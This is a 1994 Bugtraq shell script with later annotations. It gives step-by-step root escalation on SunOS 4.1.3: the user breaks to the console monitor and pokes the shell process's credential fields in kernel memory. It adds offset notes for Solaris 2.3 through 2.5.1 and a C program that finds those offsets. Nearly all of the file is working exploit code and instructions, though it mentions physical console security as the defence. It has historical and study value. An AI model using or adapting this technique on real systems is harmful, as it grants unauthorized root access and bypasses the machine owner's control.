#!/bin/sh -

# From: an100188@anon.penet.fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq@crimelab.com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible.  I
# didn't realize how simple and unobtrusive it was before I saw this
# script.  This one is for Suns, but the principle applies to any
# machine with a console monitor.  On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor.  It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back.  This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell.  I presume there are other spots where you could
# tickle a machine that don't even require that.  Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq@crimelab.com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover.  Sorry about that.  Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#       PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path so that pstat/grep/cut/cat below resolve
# to the system binaries rather than whatever the caller's PATH holds.
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

# Argument check: $1 must be the PID of the target shell (see Usage in the
# header).  The comparison is written with $1 unquoted, so it relies on
# $1 being a single word; with no argument it prints the usage text and
# exits 1.
if [ $1x = x ]; then
cat - << EOF
Usage: $0 PID
        Where PID is the PID of the shell you want to give root to.

Note - for csh the PID is stored in \$\$.
EOF
        exit 1
fi

# This is the start of the proc structure for a given PID.
# Taken from the 'procp' line of 'pstat -u PID' (field 2).  The result is
# not checked: if pstat fails or prints no 'procp' line, procp is empty
# and the text printed below is incomplete.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
# Hard-coded for SunOS 4.1.3 (per the header); the Solaris notes that
# follow the final 'exit 0' list different offsets per release.
ucred="4c"

# The script only prints instructions for the person at the console; it
# writes nothing to kernel memory itself.  Per the header, a physically
# secure console and the Sun4 "secure mode" are the stated mitigations.
cat - << EOF
On the console press '<L1>a', you should see then see the following message:
        Type  'go' to resume
        ok

type the following at the 'ok' prompt:
        b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
        go

Notes:
        * On some sun keyboards the '<L1>' key is labeled 'Stop'.
        * There is Emacs style line editing available at the 'ok' prompt.
EOF

# Nothing after this line is executed by the shell; the remainder of the
# file is notes and a separate C listing.
exit 0

# For solaris 2.3/2.4:

	ps -lp $$
	get start of proc area
	+0x24 hex to get the cred pointer
	cred +0x4 for uid, +0xc for effective uid

# for 2.5 and 2.5.1:

	ps -lp $$
	 to get start of proc area
	   +0x18 hex to get the cred pointer
	     +0x4 for uid, +0xc for effective uid


solaris offsetfinder:

#include <sys/proc.h>
 
/* Uninitialised file-scope instances used only as address bases for the
   member-offset arithmetic in main(); their contents are never read. */
struct proc p;
struct cred c;
 
/* Print, in hex, the byte offset of p_cred inside struct proc, then the
   offsets of cr_uid and cr_ruid inside struct cred.  Offsets are derived
   by casting member and base addresses to int and subtracting; this is
   the original's non-portable idiom (offsetof() from <stddef.h> is the
   standard way), and "%lx" with int arguments assumes int and long have
   the same width.  printf is used without <stdio.h> and main has an
   implicit int return with no return statement (pre-ANSI style). */
main() {
 
  printf("%lx\n",(int)&p.p_cred-(int)&p);
  printf("%lx %lx\n",(int)&c.cr_uid-(int)&c, (int)&c.cr_ruid-(int)&c);
}
